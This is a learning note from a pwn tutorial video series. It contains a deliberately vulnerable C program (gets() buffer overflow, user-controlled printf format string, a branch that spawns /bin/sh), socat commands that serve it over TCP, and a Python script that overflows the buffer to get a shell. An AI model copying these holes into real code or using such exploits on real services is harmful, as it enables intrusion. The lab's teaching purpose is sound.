本文是 B 站「你想有多 PWN」系列视频的学习笔记，包含一些视频之外的扩展知识。
#include
#include
#include
char sh[]="/bin/sh"; /* non-const global: the command string main() hands to func(), which passes it straight to system() */
int init_func(){
    /* Switch the three standard streams to unbuffered mode (mode 2 is
       _IONBF in glibc) so every write reaches the peer immediately when the
       binary is served over a socket by socat; always returns 0. */
    FILE *streams[] = { stdin, stdout, stderr };
    size_t n_streams = sizeof streams / sizeof streams[0];
    for (size_t i = 0; i < n_streams; ++i) {
        setvbuf(streams[i], 0, 2, 0);
    }
    return 0;
}
int func(char *cmd){
    /* Run cmd through the system shell and report 0 regardless of the
       shell's exit status. The only caller in this file passes the global
       sh ("/bin/sh"); a caller-controlled cmd would turn this into a direct
       OS command injection sink (CWE-78), so it must never be fed untrusted
       input. */
    (void)system(cmd);
    return 0;
}
int main(){
    /* Deliberately vulnerable lab target (the note's question_1).
       a and b are two 8-byte stack buffers; the exercise relies on the
       compiler placing b right after a, which the C standard does not
       guarantee — the layout has to be confirmed in the built binary.
       The empty "{}" initializer is a GNU extension (standard only in C23). */
    char a[8] = {};
    char b[8] = {};
    puts("input:");
    /* gets() has no length bound (CWE-242 / CWE-120): a line longer than
       8 bytes is written past the end of a onto whatever follows it on the
       stack. The mitigation is a bounded read such as
       fgets(a, sizeof a, stdin); the lab keeps gets() on purpose. */
    gets(a);
    /* The attacker-supplied line is used as the format string itself
       (CWE-134): any %-directives in the input are interpreted by printf,
       which leaks and can write stack memory. The mitigation is
       printf("%s", a). */
    printf(a);
    /* b is zero-initialised and never assigned in this function, so this
       branch is reachable only after b has been overwritten through the
       unchecked input above. */
    if(b[0]==0x10){
        func(sh);   /* func() passes "/bin/sh" to system() */
    }
    return 0;
}
使用以下命令编译、启动服务并进行连接：
# Build the lab target. No hardening options are given here, so whether the
# binary ends up with stack protector / PIE / FORTIFY depends entirely on
# this toolchain's defaults; confirm the resulting binary's protections
# match the build the note was written against before relying on the lab.
gcc question_1.c -o question_1_plus_x64
# Serve the binary on TCP port 8877, forking one process per connection.
# tcp-l without a bind= option listens on every interface, so any host that
# can reach this machine can talk to the vulnerable binary — keep it on an
# isolated lab network (the Python client below connects from 192.168.44.x).
socat tcp-l:8877,fork exec:./question_1_plus_x64,reuseaddr
# Manual check from the same machine; the Python client below does the same
# against 192.168.44.138.
nc 127.0.0.1 8877
import socket
import telnetlib
def pwn() -> None:
    """Connect to the lab service, send the note's fixed input line and go interactive.

    Writes the 9-byte line from the note (8 filler bytes, the 0x10 byte that
    main() compares b[0] against, and a newline that ends the gets() read)
    to the question_1 binary served on 192.168.44.138:8877, then attaches a
    Telnet object to the raw socket so stdin/stdout are relayed until the
    remote side closes or the user ends the session.
    """
    # Plain TCP socket to the socat listener started by the shell commands above.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # NOTE: the original comment said 127.0.0.1:8877, but the code connects
    # to the lab VM's address; point this at wherever socat is running.
    s.connect(("192.168.44.138", 8877))
    # 8 bytes fill a[8]; "\x10\n" is the byte main() checks for plus the
    # line terminator gets() stops at.
    payload = 'A' * 0x8 + '\x10\n'
    # Python 3 sockets take bytes, hence the explicit encode; every character
    # here is ASCII, so utf_8 produces exactly 9 bytes.
    s.sendall(payload.encode(encoding='utf_8', errors='strict'))
    # telnetlib is used only as a convenient stdin<->socket relay by swapping
    # in our own socket. telnetlib is deprecated since Python 3.11 and removed
    # in 3.13 (PEP 594), so this needs a select()-based loop on newer versions.
    t = telnetlib.Telnet()
    t.sock = s
    # Blocks until EOF. The socket is never closed explicitly; it is released
    # only when the process exits.
    t.interact()
if __name__ == "__main__":
    # Script entry point. The socat reminder below lists port 8888 while
    # pwn() (and the shell commands above) use 8877 — 8877 is the value
    # the rest of the note uses.
    # socat tcp-l:8888,fork exec:./question_1_plus_x64,reuseaddr
    pwn()